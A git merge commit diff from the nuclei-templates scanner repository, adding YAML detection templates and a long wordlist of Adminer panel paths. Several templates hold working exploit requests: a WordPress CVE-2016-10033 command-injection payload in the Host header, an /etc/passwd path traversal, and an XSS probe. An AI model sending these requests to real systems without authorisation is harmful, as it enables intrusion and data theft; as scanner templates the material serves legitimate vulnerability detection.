Merge branch 'master' of https://github.com/Mad-robot/nuclei-templates into pr/1132

2021-03-24 22:32:03 +05:30 · 2021-03-24 22:32:03 +05:30 · 8c2b41e7bd
parent dbaf445933 92cda223eb
commit 8c2b41e7bd
19 changed files with 980 additions and 19 deletions
--- a/README.md
+++ b/README.md
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc

 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 252           | vulnerabilities | 116 | exposed-panels | 108 |
-| takeovers        | 65        | exposures       | 63       | technologies   | 51   |
+| cves             | 254           | vulnerabilities | 117 | exposed-panels | 108 |
+| takeovers        | 65        | exposures       | 64       | technologies   | 51   |
 | misconfiguration | 54 | workflows       | 24         | miscellaneous  | 16  |
 | default-logins   | 20 | exposed-tokens  | 9  | dns            | 8            |
-| fuzzing          | 5          | helpers         | 3         | iot            | 7            |
+| fuzzing          | 6          | helpers         | 4         | iot            | 7            |

-**79 directories, 827 files**.
+**79 directories, 833 files**.

 </td>
 </tr>
--- a/cves/2016/CVE-2016-10033.yaml
+++ b/cves/2016/CVE-2016-10033.yaml
@ -0,0 +1,50 @@
+id: CVE-2016-10033
+info:
+  name: Wordpress 4.6 Remote Code Execution
+  author: princechaddha
+  severity: high
+  reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+  tags: wordpress,cve,cve2016,rce
+
+requests:
+  - raw:
+      - |+
+        GET /?author=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+      - |+
+        POST /wp-login.php?action=lostpassword HTTP/1.1
+        Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
+        Connection: close
+        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+        Accept: */*
+        Content-Length: 56
+        Content-Type: application/x-www-form-urlencoded
+
+        wp-submit=Get+New+Password&redirect_to=&user_login={{username}}
+
+    unsafe: true
+    extractors:
+      - type: regex
+        name: username
+        internal: true
+        group: 1
+        part: body
+        regex:
+          - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
+          - 'ocation: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - wp-login.php?checkemail=confirm
+        part: header
+
+      - type: status
+        status:
+          - 302
--- a/cves/2017/CVE-2017-1000170.yaml
+++ b/cves/2017/CVE-2017-1000170.yaml
@ -0,0 +1,26 @@
+id: CVE-2017-1000170
+
+info:
+  name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+  author: dwisiswant0
+  severity: high
+  reference: https://www.exploit-db.com/exploits/49693
+  description: jqueryFileTree 2.1.5 and older Directory Traversal
+  tags: cve,cve2017,wordpress,wp-plugin,lfi
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+    body: "dir=%2Fetc%2F&onlyFiles=true"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<li class='file ext_passwd'>"
+          - "<a rel='/passwd'>passwd</a></li>"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
@ -0,0 +1,29 @@
+id: CVE-2020-17453
+
+info:
+  name: WSO2 Carbon Management Console - XSS
+  author: madrobot
+  severity: medium
+  description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+  tags: xss,wso2,cve2020
+  # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "'';alert('nuclei')//';"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
--- a/exposed-panels/crxde-lite.yaml
+++ b/exposed-panels/crxde-lite.yaml
@ -1,4 +1,4 @@
-id: crxde
+id: crxde-lite

 info:
  name: CRXDE Lite
--- a/exposed-panels/gitlab-detect.yaml
+++ b/exposed-panels/gitlab-detect.yaml
@ -9,14 +9,16 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/users/sign_in"
-      - "{{BaseURL}}/users/sign_up"
-      - "{{BaseURL}}/explore"

    redirects: true
    max-redirects: 2
+    matchers-condition: and
    matchers:
      - type: word
        words:
-          - "GitLab"
-          - "Register for GitLab"
-          - "Explore GitLab"
+          - 'GitLab'
+          - 'https://about.gitlab.com'
+
+      - type: status
+        status:
+          - 200
--- a/exposures/apis/openapi.yaml
+++ b/exposures/apis/openapi.yaml
@ -4,6 +4,7 @@ info:
  name: OpenAPI
  author: pdteam
  severity: info
+  tags: api

 requests:
  - method: GET
--- a/exposures/apis/swagger-api.yaml
+++ b/exposures/apis/swagger-api.yaml
@ -1,9 +1,10 @@
 id: swagger-api

 info:
-  name: Swagger API
-  author: pd-team
+  name: Public Swagger API
+  author: pdteam
  severity: info
+  tags: api,swagger

 requests:
  - method: GET
--- a/exposures/apis/wadl-api.yaml
+++ b/exposures/apis/wadl-api.yaml
@ -4,6 +4,7 @@ info:
  name: wadl file disclosure
  author: 0xrudra & manuelbua
  severity: info
+  tags: api

  # References:
  # - https://github.com/dwisiswant0/wadl-dumper
--- a/exposures/apis/wsdl-api.yaml
+++ b/exposures/apis/wsdl-api.yaml
@ -4,6 +4,7 @@ info:
  name: wsdl-detect
  author: jarijaas
  severity: info
+  tags: api

 # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/)
 # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx
--- a/exposures/backups/settings-php-files.yaml
+++ b/exposures/backups/settings-php-files.yaml
@ -0,0 +1,29 @@
+id: settings-php-files
+
+info:
+  name: settings.php information disclosure
+  author: sheikhrishad
+  severity: medium
+  tags: backup
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/settings.php.bak"
+      - "{{BaseURL}}/settings.php.dist"
+      - "{{BaseURL}}/settings.php.old"
+      - "{{BaseURL}}/settings.php.save"
+      - "{{BaseURL}}/settings.php.swp"
+      - "{{BaseURL}}/settings.php.txt"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB"
+        condition: and
+
+      - type: status
+        status:
+          - 200
--- a/exposures/backups/sql-dump.yaml
+++ b/exposures/backups/sql-dump.yaml
@ -4,6 +4,7 @@ info:
  name: MySQL Dump Files
  author: geeknik & @dwisiswant0
  severity: medium
+  tags: backup

 requests:
  - method: GET
--- a/exposures/backups/zip-backup-files.yaml
+++ b/exposures/backups/zip-backup-files.yaml
@ -4,6 +4,7 @@ info:
  name: Compressed Web File
  author: Toufik Airane & @dwisiswant0
  severity: medium
+  tags: backup

 requests:
  - method: GET
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -0,0 +1,46 @@
+id: adminer-panel-fuzz
+info:
+  name: Adminer Login Panel Fuzz
+  author: random-robbie & meme-lord
+  severity: info
+  reference: https://blog.sorcery.ie/posts/adminer/
+  tags: fuzz,adminer
+
+  # <= 4.2.4 can have unauthenticated RCE via SQLite driver
+  # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL
+  # Most versions have some kind of SSRF usability
+  # Is generally handy if you find SQL creds
+
+requests:
+
+  - payloads:
+      path: helpers/wordlists/adminer-paths.txt
+
+    attack: sniper
+    threads: 50
+
+    raw:
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Accept-Language: en-US,en;q=0.5
+        Referer: {{BaseURL}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Login - Adminer"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<span class="version">([0-9.]+)'
--- a/helpers/wordlists/adminer-paths.txt
+++ b/helpers/wordlists/adminer-paths.txt
@ -0,0 +1,741 @@
+/_adminer.php
+/adm.php
+/admin/adminer.php
+/adminer-2.0.0.php
+/adminer-2.1.0.php
+/adminer-2.2.0.php
+/adminer-2.2.1.php
+/adminer-2.3.0.php
+/adminer-2.3.2.php
+/adminer-3.0.0.php
+/adminer-3.0.1-en.php
+/adminer-3.0.1-mysql-en.php
+/adminer-3.0.1-mysql.php
+/adminer-3.0.1.php
+/adminer-3.0.1/
+/adminer-3.1.0-en.php
+/adminer-3.1.0-mysql-en.php
+/adminer-3.1.0-mysql.php
+/adminer-3.1.0.php
+/adminer-3.1.0/
+/adminer-3.2.0-en.php
+/adminer-3.2.0-mysql-en.php
+/adminer-3.2.0-mysql.php
+/adminer-3.2.0.php
+/adminer-3.2.0/
+/adminer-3.2.1.php
+/adminer-3.2.2-en.php
+/adminer-3.2.2-mysql-en.php
+/adminer-3.2.2-mysql.php
+/adminer-3.2.2.php
+/adminer-3.2.2/
+/adminer-3.3.0-en.php
+/adminer-3.3.0-mysql-en.php
+/adminer-3.3.0-mysql.php
+/adminer-3.3.0.php
+/adminer-3.3.0/
+/adminer-3.3.1-en.php
+/adminer-3.3.1-mysql-en.php
+/adminer-3.3.1-mysql.php
+/adminer-3.3.1.php
+/adminer-3.3.1/
+/adminer-3.3.2.php
+/adminer-3.3.3-en.php
+/adminer-3.3.3-mysql-en.php
+/adminer-3.3.3-mysql.php
+/adminer-3.3.3.php
+/adminer-3.3.3/
+/adminer-3.3.4-en.php
+/adminer-3.3.4-mysql-en.php
+/adminer-3.3.4-mysql.php
+/adminer-3.3.4.php
+/adminer-3.3.4/
+/adminer-3.4.0-en.php
+/adminer-3.4.0-mysql-en.php
+/adminer-3.4.0-mysql.php
+/adminer-3.4.0.php
+/adminer-3.4.0/
+/adminer-3.5.0.php
+/adminer-3.5.1-en.php
+/adminer-3.5.1-mysql-en.php
+/adminer-3.5.1-mysql.php
+/adminer-3.5.1.php
+/adminer-3.5.1/
+/adminer-3.6.0.php
+/adminer-3.6.1-en.php
+/adminer-3.6.1-mysql-en.php
+/adminer-3.6.1-mysql.php
+/adminer-3.6.1.php
+/adminer-3.6.1/
+/adminer-3.6.2-en.php
+/adminer-3.6.2-mysql-en.php
+/adminer-3.6.2-mysql.php
+/adminer-3.6.2.php
+/adminer-3.6.2/
+/adminer-3.6.3-en.php
+/adminer-3.6.3-mysql-en.php
+/adminer-3.6.3-mysql.php
+/adminer-3.6.3.php
+/adminer-3.6.3/
+/adminer-3.6.4-en.php
+/adminer-3.6.4-mysql-en.php
+/adminer-3.6.4-mysql.php
+/adminer-3.6.4.php
+/adminer-3.6.4/
+/adminer-3.7.0-en.php
+/adminer-3.7.0-mysql-en.php
+/adminer-3.7.0-mysql.php
+/adminer-3.7.0.php
+/adminer-3.7.0/
+/adminer-3.7.1-en.php
+/adminer-3.7.1-mysql-en.php
+/adminer-3.7.1-mysql.php
+/adminer-3.7.1.php
+/adminer-3.7.1/
+/adminer-4.0.0.php
+/adminer-4.0.1-en.php
+/adminer-4.0.1-mysql-en.php
+/adminer-4.0.1-mysql.php
+/adminer-4.0.1.php
+/adminer-4.0.1/
+/adminer-4.0.2-en.php
+/adminer-4.0.2-mysql-en.php
+/adminer-4.0.2-mysql.php
+/adminer-4.0.2.php
+/adminer-4.0.2/
+/adminer-4.0.3-en.php
+/adminer-4.0.3-mysql-en.php
+/adminer-4.0.3-mysql.php
+/adminer-4.0.3.php
+/adminer-4.0.3/
+/adminer-4.1.0-en.php
+/adminer-4.1.0-mysql-en.php
+/adminer-4.1.0-mysql.php
+/adminer-4.1.0.php
+/adminer-4.1.0/
+/adminer-4.2.0-en.php
+/adminer-4.2.0-mysql-en.php
+/adminer-4.2.0-mysql.php
+/adminer-4.2.0.php
+/adminer-4.2.0/
+/adminer-4.2.1-en.php
+/adminer-4.2.1-mysql-en.php
+/adminer-4.2.1-mysql.php
+/adminer-4.2.1.php
+/adminer-4.2.1/
+/adminer-4.2.2-en.php
+/adminer-4.2.2-mysql-en.php
+/adminer-4.2.2-mysql.php
+/adminer-4.2.2.php
+/adminer-4.2.2/
+/adminer-4.2.3-en.php
+/adminer-4.2.3-mysql-en.php
+/adminer-4.2.3-mysql.php
+/adminer-4.2.3.php
+/adminer-4.2.3/
+/adminer-4.2.4-en.php
+/adminer-4.2.4-mysql-en.php
+/adminer-4.2.4-mysql.php
+/adminer-4.2.4.php
+/adminer-4.2.4/
+/adminer-4.2.5-cs.php
+/adminer-4.2.5-de.php
+/adminer-4.2.5-en.php
+/adminer-4.2.5-mysql-cs.php
+/adminer-4.2.5-mysql-de.php
+/adminer-4.2.5-mysql-en.php
+/adminer-4.2.5-mysql-pl.php
+/adminer-4.2.5-mysql-sk.php
+/adminer-4.2.5-mysql.php
+/adminer-4.2.5-pl.php
+/adminer-4.2.5-sk.php
+/adminer-4.2.5.php
+/adminer-4.2.5/
+/adminer-4.3.0-cs.php
+/adminer-4.3.0-de.php
+/adminer-4.3.0-en.php
+/adminer-4.3.0-mysql-cs.php
+/adminer-4.3.0-mysql-de.php
+/adminer-4.3.0-mysql-en.php
+/adminer-4.3.0-mysql-pl.php
+/adminer-4.3.0-mysql-sk.php
+/adminer-4.3.0-mysql.php
+/adminer-4.3.0-pl.php
+/adminer-4.3.0-sk.php
+/adminer-4.3.0.php
+/adminer-4.3.0/
+/adminer-4.3.1-cs.php
+/adminer-4.3.1-de.php
+/adminer-4.3.1-en.php
+/adminer-4.3.1-mysql-cs.php
+/adminer-4.3.1-mysql-de.php
+/adminer-4.3.1-mysql-en.php
+/adminer-4.3.1-mysql-pl.php
+/adminer-4.3.1-mysql-sk.php
+/adminer-4.3.1-mysql.php
+/adminer-4.3.1-pl.php
+/adminer-4.3.1-sk.php
+/adminer-4.3.1.php
+/adminer-4.3.1/
+/adminer-4.4.0-cs.php
+/adminer-4.4.0-de.php
+/adminer-4.4.0-en.php
+/adminer-4.4.0-mysql-cs.php
+/adminer-4.4.0-mysql-de.php
+/adminer-4.4.0-mysql-en.php
+/adminer-4.4.0-mysql-pl.php
+/adminer-4.4.0-mysql-sk.php
+/adminer-4.4.0-mysql.php
+/adminer-4.4.0-pl.php
+/adminer-4.4.0-sk.php
+/adminer-4.4.0.php
+/adminer-4.4.0/
+/adminer-4.5.0-cs.php
+/adminer-4.5.0-de.php
+/adminer-4.5.0-en.php
+/adminer-4.5.0-mysql-cs.php
+/adminer-4.5.0-mysql-de.php
+/adminer-4.5.0-mysql-en.php
+/adminer-4.5.0-mysql-pl.php
+/adminer-4.5.0-mysql-sk.php
+/adminer-4.5.0-mysql.php
+/adminer-4.5.0-pl.php
+/adminer-4.5.0-sk.php
+/adminer-4.5.0.php
+/adminer-4.5.0/
+/adminer-4.6.0-cs.php
+/adminer-4.6.0-de.php
+/adminer-4.6.0-en.php
+/adminer-4.6.0-mysql-cs.php
+/adminer-4.6.0-mysql-de.php
+/adminer-4.6.0-mysql-en.php
+/adminer-4.6.0-mysql-pl.php
+/adminer-4.6.0-mysql-sk.php
+/adminer-4.6.0-mysql.php
+/adminer-4.6.0-pl.php
+/adminer-4.6.0-sk.php
+/adminer-4.6.0.php
+/adminer-4.6.0/
+/adminer-4.6.1-cs.php
+/adminer-4.6.1-de.php
+/adminer-4.6.1-en.php
+/adminer-4.6.1-mysql-cs.php
+/adminer-4.6.1-mysql-de.php
+/adminer-4.6.1-mysql-en.php
+/adminer-4.6.1-mysql-pl.php
+/adminer-4.6.1-mysql-sk.php
+/adminer-4.6.1-mysql.php
+/adminer-4.6.1-pl.php
+/adminer-4.6.1-sk.php
+/adminer-4.6.1.php
+/adminer-4.6.1/
+/adminer-4.6.2-cs.php
+/adminer-4.6.2-de.php
+/adminer-4.6.2-en.php
+/adminer-4.6.2-mysql-cs.php
+/adminer-4.6.2-mysql-de.php
+/adminer-4.6.2-mysql-en.php
+/adminer-4.6.2-mysql-pl.php
+/adminer-4.6.2-mysql-sk.php
+/adminer-4.6.2-mysql.php
+/adminer-4.6.2-pl.php
+/adminer-4.6.2-sk.php
+/adminer-4.6.2.php
+/adminer-4.6.2/
+/adminer-4.6.3-cs.php
+/adminer-4.6.3-de.php
+/adminer-4.6.3-en.php
+/adminer-4.6.3-mysql-cs.php
+/adminer-4.6.3-mysql-de.php
+/adminer-4.6.3-mysql-en.php
+/adminer-4.6.3-mysql-pl.php
+/adminer-4.6.3-mysql-sk.php
+/adminer-4.6.3-mysql.php
+/adminer-4.6.3-pl.php
+/adminer-4.6.3-sk.php
+/adminer-4.6.3.php
+/adminer-4.6.3/
+/adminer-4.7.0-cs.php
+/adminer-4.7.0-de.php
+/adminer-4.7.0-en.php
+/adminer-4.7.0-mysql-cs.php
+/adminer-4.7.0-mysql-de.php
+/adminer-4.7.0-mysql-en.php
+/adminer-4.7.0-mysql-pl.php
+/adminer-4.7.0-mysql-sk.php
+/adminer-4.7.0-mysql.php
+/adminer-4.7.0-pl.php
+/adminer-4.7.0-sk.php
+/adminer-4.7.0.php
+/adminer-4.7.0/
+/adminer-4.7.1-cs.php
+/adminer-4.7.1-de.php
+/adminer-4.7.1-en.php
+/adminer-4.7.1-mysql-cs.php
+/adminer-4.7.1-mysql-de.php
+/adminer-4.7.1-mysql-en.php
+/adminer-4.7.1-mysql-pl.php
+/adminer-4.7.1-mysql-sk.php
+/adminer-4.7.1-mysql.php
+/adminer-4.7.1-pl.php
+/adminer-4.7.1-sk.php
+/adminer-4.7.1.php
+/adminer-4.7.1/
+/adminer-4.7.2-cs.php
+/adminer-4.7.2-de.php
+/adminer-4.7.2-en.php
+/adminer-4.7.2-mysql-cs.php
+/adminer-4.7.2-mysql-de.php
+/adminer-4.7.2-mysql-en.php
+/adminer-4.7.2-mysql-pl.php
+/adminer-4.7.2-mysql-sk.php
+/adminer-4.7.2-mysql.php
+/adminer-4.7.2-pl.php
+/adminer-4.7.2-sk.php
+/adminer-4.7.2.php
+/adminer-4.7.2/
+/adminer-4.7.3-cs.php
+/adminer-4.7.3-de.php
+/adminer-4.7.3-en.php
+/adminer-4.7.3-mysql-cs.php
+/adminer-4.7.3-mysql-de.php
+/adminer-4.7.3-mysql-en.php
+/adminer-4.7.3-mysql-pl.php
+/adminer-4.7.3-mysql-sk.php
+/adminer-4.7.3-mysql.php
+/adminer-4.7.3-pl.php
+/adminer-4.7.3-sk.php
+/adminer-4.7.3.php
+/adminer-4.7.3/
+/adminer-4.7.4-cs.php
+/adminer-4.7.4-de.php
+/adminer-4.7.4-en.php
+/adminer-4.7.4-mysql-cs.php
+/adminer-4.7.4-mysql-de.php
+/adminer-4.7.4-mysql-en.php
+/adminer-4.7.4-mysql-pl.php
+/adminer-4.7.4-mysql-sk.php
+/adminer-4.7.4-mysql.php
+/adminer-4.7.4-pl.php
+/adminer-4.7.4-sk.php
+/adminer-4.7.4.php
+/adminer-4.7.4/
+/adminer-4.7.5-cs.php
+/adminer-4.7.5-de.php
+/adminer-4.7.5-en.php
+/adminer-4.7.5-mysql-cs.php
+/adminer-4.7.5-mysql-de.php
+/adminer-4.7.5-mysql-en.php
+/adminer-4.7.5-mysql-pl.php
+/adminer-4.7.5-mysql-sk.php
+/adminer-4.7.5-mysql.php
+/adminer-4.7.5-pl.php
+/adminer-4.7.5-sk.php
+/adminer-4.7.5.php
+/adminer-4.7.5/
+/adminer-4.7.6-cs.php
+/adminer-4.7.6-de.php
+/adminer-4.7.6-en.php
+/adminer-4.7.6-mysql-cs.php
+/adminer-4.7.6-mysql-de.php
+/adminer-4.7.6-mysql-en.php
+/adminer-4.7.6-mysql-pl.php
+/adminer-4.7.6-mysql-sk.php
+/adminer-4.7.6-mysql.php
+/adminer-4.7.6-pl.php
+/adminer-4.7.6-sk.php
+/adminer-4.7.6.php
+/adminer-4.7.6/
+/adminer-4.7.7-cs.php
+/adminer-4.7.7-de.php
+/adminer-4.7.7-en.php
+/adminer-4.7.7-mysql-cs.php
+/adminer-4.7.7-mysql-de.php
+/adminer-4.7.7-mysql-en.php
+/adminer-4.7.7-mysql-pl.php
+/adminer-4.7.7-mysql-sk.php
+/adminer-4.7.7-mysql.php
+/adminer-4.7.7-pl.php
+/adminer-4.7.7-sk.php
+/adminer-4.7.7.php
+/adminer-4.7.7/
+/adminer-4.7.8-cs.php
+/adminer-4.7.8-de.php
+/adminer-4.7.8-en.php
+/adminer-4.7.8-mysql-cs.php
+/adminer-4.7.8-mysql-de.php
+/adminer-4.7.8-mysql-en.php
+/adminer-4.7.8-mysql-pl.php
+/adminer-4.7.8-mysql-sk.php
+/adminer-4.7.8-mysql.php
+/adminer-4.7.8-pl.php
+/adminer-4.7.8-sk.php
+/adminer-4.7.8.php
+/adminer-4.7.8/
+/adminer-4.7.9-cs.php
+/adminer-4.7.9-de.php
+/adminer-4.7.9-en.php
+/adminer-4.7.9-mysql-cs.php
+/adminer-4.7.9-mysql-de.php
+/adminer-4.7.9-mysql-en.php
+/adminer-4.7.9-mysql-pl.php
+/adminer-4.7.9-mysql-sk.php
+/adminer-4.7.9-mysql.php
+/adminer-4.7.9-pl.php
+/adminer-4.7.9-sk.php
+/adminer-4.7.9.php
+/adminer-4.7.9/
+/adminer-4.8.0-cs.php
+/adminer-4.8.0-de.php
+/adminer-4.8.0-en.php
+/adminer-4.8.0-mysql-cs.php
+/adminer-4.8.0-mysql-de.php
+/adminer-4.8.0-mysql-en.php
+/adminer-4.8.0-mysql-pl.php
+/adminer-4.8.0-mysql-sk.php
+/adminer-4.8.0-mysql.php
+/adminer-4.8.0-pl.php
+/adminer-4.8.0-sk.php
+/adminer-4.8.0.php
+/adminer-4.8.0/
+/adminer-mysql.php
+/adminer.php
+/adminer/
+/adminer/adminer.php
+/adminer1.php
+/data/adminer.php
+/editor-3.0.1-mysql-en.php
+/editor-3.0.1-mysql.php
+/editor-3.0.1.php
+/editor-3.1.0-mysql-en.php
+/editor-3.1.0-mysql.php
+/editor-3.1.0.php
+/editor-3.2.0-mysql-en.php
+/editor-3.2.0-mysql.php
+/editor-3.2.0.php
+/editor-3.2.2-mysql-en.php
+/editor-3.2.2-mysql.php
+/editor-3.2.2.php
+/editor-3.3.0-mysql-en.php
+/editor-3.3.0-mysql.php
+/editor-3.3.0.php
+/editor-3.3.1-mysql-en.php
+/editor-3.3.1-mysql.php
+/editor-3.3.1.php
+/editor-3.3.3-mysql-en.php
+/editor-3.3.3-mysql.php
+/editor-3.3.3.php
+/editor-3.3.4-mysql-en.php
+/editor-3.3.4-mysql.php
+/editor-3.3.4.php
+/editor-3.4.0-mysql-en.php
+/editor-3.4.0-mysql.php
+/editor-3.4.0.php
+/editor-3.5.1-mysql-en.php
+/editor-3.5.1-mysql.php
+/editor-3.5.1.php
+/editor-3.6.1-mysql-en.php
+/editor-3.6.1-mysql.php
+/editor-3.6.1.php
+/editor-3.6.2-mysql-en.php
+/editor-3.6.2-mysql.php
+/editor-3.6.2.php
+/editor-3.6.3-mysql-en.php
+/editor-3.6.3-mysql.php
+/editor-3.6.3.php
+/editor-3.6.4-mysql-en.php
+/editor-3.6.4-mysql.php
+/editor-3.6.4.php
+/editor-3.7.0-mysql-en.php
+/editor-3.7.0-mysql.php
+/editor-3.7.0.php
+/editor-3.7.1-mysql-en.php
+/editor-3.7.1-mysql.php
+/editor-3.7.1.php
+/editor-4.0.1-en.php
+/editor-4.0.1-mysql-en.php
+/editor-4.0.1-mysql.php
+/editor-4.0.1.php
+/editor-4.0.2-en.php
+/editor-4.0.2-mysql-en.php
+/editor-4.0.2-mysql.php
+/editor-4.0.2.php
+/editor-4.0.3-en.php
+/editor-4.0.3-mysql-en.php
+/editor-4.0.3-mysql.php
+/editor-4.0.3.php
+/editor-4.1.0-en.php
+/editor-4.1.0-mysql-en.php
+/editor-4.1.0-mysql.php
+/editor-4.1.0.php
+/editor-4.2.0-en.php
+/editor-4.2.0-mysql-en.php
+/editor-4.2.0-mysql.php
+/editor-4.2.0.php
+/editor-4.2.1-en.php
+/editor-4.2.1-mysql-en.php
+/editor-4.2.1-mysql.php
+/editor-4.2.1.php
+/editor-4.2.2-en.php
+/editor-4.2.2-mysql-en.php
+/editor-4.2.2-mysql.php
+/editor-4.2.2.php
+/editor-4.2.3-en.php
+/editor-4.2.3-mysql-en.php
+/editor-4.2.3-mysql.php
+/editor-4.2.3.php
+/editor-4.2.4-en.php
+/editor-4.2.4-mysql-en.php
+/editor-4.2.4-mysql.php
+/editor-4.2.4.php
+/editor-4.2.5-cs.php
+/editor-4.2.5-de.php
+/editor-4.2.5-en.php
+/editor-4.2.5-mysql-cs.php
+/editor-4.2.5-mysql-de.php
+/editor-4.2.5-mysql-en.php
+/editor-4.2.5-mysql-pl.php
+/editor-4.2.5-mysql-sk.php
+/editor-4.2.5-mysql.php
+/editor-4.2.5-pl.php
+/editor-4.2.5-sk.php
+/editor-4.2.5.php
+/editor-4.3.0-cs.php
+/editor-4.3.0-de.php
+/editor-4.3.0-en.php
+/editor-4.3.0-mysql-cs.php
+/editor-4.3.0-mysql-de.php
+/editor-4.3.0-mysql-en.php
+/editor-4.3.0-mysql-pl.php
+/editor-4.3.0-mysql-sk.php
+/editor-4.3.0-mysql.php
+/editor-4.3.0-pl.php
+/editor-4.3.0-sk.php
+/editor-4.3.0.php
+/editor-4.3.1-cs.php
+/editor-4.3.1-de.php
+/editor-4.3.1-en.php
+/editor-4.3.1-mysql-cs.php
+/editor-4.3.1-mysql-de.php
+/editor-4.3.1-mysql-en.php
+/editor-4.3.1-mysql-pl.php
+/editor-4.3.1-mysql-sk.php
+/editor-4.3.1-mysql.php
+/editor-4.3.1-pl.php
+/editor-4.3.1-sk.php
+/editor-4.3.1.php
+/editor-4.4.0-cs.php
+/editor-4.4.0-de.php
+/editor-4.4.0-en.php
+/editor-4.4.0-mysql-cs.php
+/editor-4.4.0-mysql-de.php
+/editor-4.4.0-mysql-en.php
+/editor-4.4.0-mysql-pl.php
+/editor-4.4.0-mysql-sk.php
+/editor-4.4.0-mysql.php
+/editor-4.4.0-pl.php
+/editor-4.4.0-sk.php
+/editor-4.4.0.php
+/editor-4.5.0-cs.php
+/editor-4.5.0-de.php
+/editor-4.5.0-en.php
+/editor-4.5.0-mysql-cs.php
+/editor-4.5.0-mysql-de.php
+/editor-4.5.0-mysql-en.php
+/editor-4.5.0-mysql-pl.php
+/editor-4.5.0-mysql-sk.php
+/editor-4.5.0-mysql.php
+/editor-4.5.0-pl.php
+/editor-4.5.0-sk.php
+/editor-4.5.0.php
+/editor-4.6.0-cs.php
+/editor-4.6.0-de.php
+/editor-4.6.0-en.php
+/editor-4.6.0-mysql-cs.php
+/editor-4.6.0-mysql-de.php
+/editor-4.6.0-mysql-en.php
+/editor-4.6.0-mysql-pl.php
+/editor-4.6.0-mysql-sk.php
+/editor-4.6.0-mysql.php
+/editor-4.6.0-pl.php
+/editor-4.6.0-sk.php
+/editor-4.6.0.php
+/editor-4.6.1-cs.php
+/editor-4.6.1-de.php
+/editor-4.6.1-en.php
+/editor-4.6.1-mysql-cs.php
+/editor-4.6.1-mysql-de.php
+/editor-4.6.1-mysql-en.php
+/editor-4.6.1-mysql-pl.php
+/editor-4.6.1-mysql-sk.php
+/editor-4.6.1-mysql.php
+/editor-4.6.1-pl.php
+/editor-4.6.1-sk.php
+/editor-4.6.1.php
+/editor-4.6.2-cs.php
+/editor-4.6.2-de.php
+/editor-4.6.2-en.php
+/editor-4.6.2-mysql-cs.php
+/editor-4.6.2-mysql-de.php
+/editor-4.6.2-mysql-en.php
+/editor-4.6.2-mysql-pl.php
+/editor-4.6.2-mysql-sk.php
+/editor-4.6.2-mysql.php
+/editor-4.6.2-pl.php
+/editor-4.6.2-sk.php
+/editor-4.6.2.php
+/editor-4.6.3-cs.php
+/editor-4.6.3-de.php
+/editor-4.6.3-en.php
+/editor-4.6.3-mysql-cs.php
+/editor-4.6.3-mysql-de.php
+/editor-4.6.3-mysql-en.php
+/editor-4.6.3-mysql-pl.php
+/editor-4.6.3-mysql-sk.php
+/editor-4.6.3-mysql.php
+/editor-4.6.3-pl.php
+/editor-4.6.3-sk.php
+/editor-4.6.3.php
+/editor-4.7.0-cs.php
+/editor-4.7.0-de.php
+/editor-4.7.0-en.php
+/editor-4.7.0-mysql-cs.php
+/editor-4.7.0-mysql-de.php
+/editor-4.7.0-mysql-en.php
+/editor-4.7.0-mysql-pl.php
+/editor-4.7.0-mysql-sk.php
+/editor-4.7.0-mysql.php
+/editor-4.7.0-pl.php
+/editor-4.7.0-sk.php
+/editor-4.7.0.php
+/editor-4.7.1-cs.php
+/editor-4.7.1-de.php
+/editor-4.7.1-en.php
+/editor-4.7.1-mysql-cs.php
+/editor-4.7.1-mysql-de.php
+/editor-4.7.1-mysql-en.php
+/editor-4.7.1-mysql-pl.php
+/editor-4.7.1-mysql-sk.php
+/editor-4.7.1-mysql.php
+/editor-4.7.1-pl.php
+/editor-4.7.1-sk.php
